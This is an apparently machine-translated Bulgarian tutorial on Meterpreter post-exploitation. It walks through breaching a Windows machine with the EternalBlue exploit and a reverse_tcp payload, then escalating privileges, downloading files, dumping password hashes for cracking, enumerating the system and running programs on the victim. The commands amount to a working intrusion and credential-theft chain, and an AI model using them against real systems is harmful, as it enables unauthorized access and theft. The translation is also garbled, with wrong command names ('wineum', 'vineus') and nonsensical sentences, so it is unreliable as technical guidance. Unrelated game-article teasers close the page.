метасплойт

След експлоатация с Meterpreter

След експлоатация с Meterpreter
Това е въведение към приставката за полезен товар Meterpreter в Metasploit. В този кратък урок ще обсъдим как да го използвате, за да приложите след експлоатация към система с ОС WINDOWS, след като вече сте го нарушили с помощта на Eternalblue експлойт. Ще се ограничим до достъпа до системата на Windows и нейното проучване и всички неща, които ще направим, ще се фокусират върху достъпа до информация и потребителски идентификационни данни.

Въведение в Meterpreter

Meterpreter е полезен товар за атака в рамките на Metasploit, който позволява на извършителя да контролира и навигира в компютъра на жертвата чрез командна обвивка. Може да се окаже много гъвкав инструмент, когато става въпрос за тестване на проникване.  Това е инструмент след експлоатация, който се основава на впръскване на DLL в паметта, което означава, че инжектираният DLL работи, като създава нов процес, който изисква системата да стартира инжектирания DLL. Той може да ви даде достъп до невидима командна обвивка на машина-жертва, като ви позволява да стартирате изпълними файлове и профилни мрежи.

Първоначално е написан за Metasploit 2.x и е надграден за Metasploit 3.

Ще обсъдим подробно употребите на Meterpreter, но преди това нека поговорим за полезния товар като цяло

Какво представляват полезните товари?

Полезният товар в Metasploit са модули, което означава, че са фрагменти от кодове в Metasploit, които се изпълняват в отдалечената система, към която сме насочени. Първо се изпраща експлойт модулът, който инсталира модула на полезния товар в системата. Тогава полезният товар предоставя достъп до нападателя (ограничен или пълноценен, зависи от съдържанието на полезния товар). За да разгледаме допълнително функционирането на полезния товар, трябва да обсъдим неговите видове, които са общо 3:

Сингли

Тези полезни натоварвания са напълно самостоятелни, което означава, че те могат да бъдат толкова основни, колкото кодовете на вратарите, които позволяват на потребителя в целевата система.

Стагери

Стагерите са полезни товари, които събират приложения в целевата система и ги изпращат на нападателя. Той установява връзката между жертвата и нашата локална машина.

Етапи

След като стажерите имат достъп до системата, те изтеглят модулите за етапи. Сценичните модули премахват капачката на размера на измервателния уред.

Примери за етапи биха били обикновена обвивка, черупка на ipwn на iPhone, модули Meterpreter, инжектиране на VNC.

Можете да определите типа полезен товар, като измислите името му. Единичните полезни натоварвания обикновено са от този формат /

Експлоатация с Meterpreter

Първо, стартирайте конзолата msf, като напишете следната команда на терминала в прозореца на терминала Kali.

$ sudo msfconsole

Използваме reverse_tcp като стагър и Meterpreter като сцена.

Ще започнем с настройването на Eternal Blue exploit. Изберете (ms17_010_eternalblue), след това задайте windows / x64 / meterpreter / reverse_tcp като избрания полезен товар

След това конфигурирайте настройките на експлоата, след което стартирайте експлоата с командата exploit:

$ set полезен товар windows / x64 / meterpreter / reverse_tcp
$ set rhost 192.168.198.136
$ експлойт

The Eternalblue експлойт е активиран успешно.

След експлоатация

Ние имаме достъп и манипулираме вече компрометираната система по време на експлоатацията.

Сега можем да направим много неща, когато имаме достъп до системата, но както споменахме по-горе, трябва да останем фокусирани главно върху изтеглянето на информация и получаването на потребителски идентификационни данни тук

Управление на привилегията за достъп:

В зависимост от модула на полезния товар и експлоата, който сте използвали, може да се сблъскате с определени ограничения на достъпа, които сериозно да осакатят способностите ви за маневриране на машината на жертвата. Можете да заобиколите този проблем с повишаване на привилегиите чрез изтриване на пароли и подправяне на регистрите. Можете също така да ескалирате привилегии, като използвате командата get system -com на Meterpreter.

$ getsystem
$ getuid

Прехвърляне на файлове с Meterpreter

С Meterpreter можете да изтеглите файл с помощта на командата $ download-.

$ download / windows / system32 / drivers / etc / hosts

По същия начин можете да качите информация и в машината, като използвате командата $ upload-

Извличане на потребителски идентификационни данни:

Използвайте кодов скрипт credential_collector, за да извлечете информация за потребителски акаунти, или използвайте модула за хеш дъмпинг за подобен ефект.

Ще използваме модула за изхвърляне на хеш, за да продължим с събирането на идентификационните данни. Въведете следната команда msf.

$ run post / windows / collect / hashdump

Както виждаме, получихме акаунтите на Coen, гост и администратор. Хешът на LM (администратор) и NTLM (гост) се отнася до празни пароли, докато хешът Coen е парола, която ще трябва да пробиете. Можете да го направите, като използвате средство за разбиване на пароли.

Автоматизиране на изстъргването на системата

Може да е досадно да събирате информация с отделни входни изявления, които трябва да продължите да подавате на командната обвивка. Удобно е, че можете донякъде да автоматизирате този процес с лозов скрипт. Скриптът събира информация от жертвата и изтегля данните в нашата локална машина. Ще ви бъде казано къде се записва изходът, както можете да видите в четвъртия ред отгоре:

$ run wineum

Имайте предвид, че пътят, където се съхранява изходът към всяка команда, може да се различава от показания тук.

Нека се забъркаме още малко

Изпълнение на файлове

Можете да стартирате всеки файл в системата, като използвате: execute -f . Това включва както изпълними файлове, така и програми с множество поддържащи файлове. Например, за да стартирате вграденото приложение за калкулатор в Windows os, напишете execute -f calc.exe

Правене на екранни снимки

Можете също така да заснемете екранни снимки от гледна точка на потребителя. Просто напишете екранна снимка в командната обвивка на Meterpreter и ще получите екранна снимка на дисплея в системата.

$ execute -f calc.exe
$ скрийншот

Заключение:

Това е кратко въведение към приставката Meterpreter в рамката на Metasploit, заедно с кратко ръководство, показващо най-основните приложения. Тук научихме как можем да нарушим Windows OS система с Eternalblue exploit, за да получим достъп, след това да използваме Meterpreter за ескалиране на привилегии, събиране на информация ръчно и чрез автоматизиращата команда vineus. Също така научихме как да изпълняваме файлове на машината жертва.

Meterpreter може да служи като значително средство за откриване на уязвимости, въпреки че е конгломерат от основни инструменти в рамките на Metasploit.

OpenTTD срещу Simutrans
Създаването на собствена транспортна симулация може да бъде забавно, релаксиращо и изключително примамливо. Ето защо трябва да сте сигурни, че изпробв...
Урок за OpenTTD
OpenTTD е една от най-популярните бизнес симулационни игри там. В тази игра трябва да създадете прекрасен транспортен бизнес. Въпреки това, ще започне...
SuperTuxKart за Linux
SuperTuxKart е страхотно заглавие, създадено да ви предостави безплатно изживяването на Mario Kart във вашата Linux система. Играта е доста предизвика...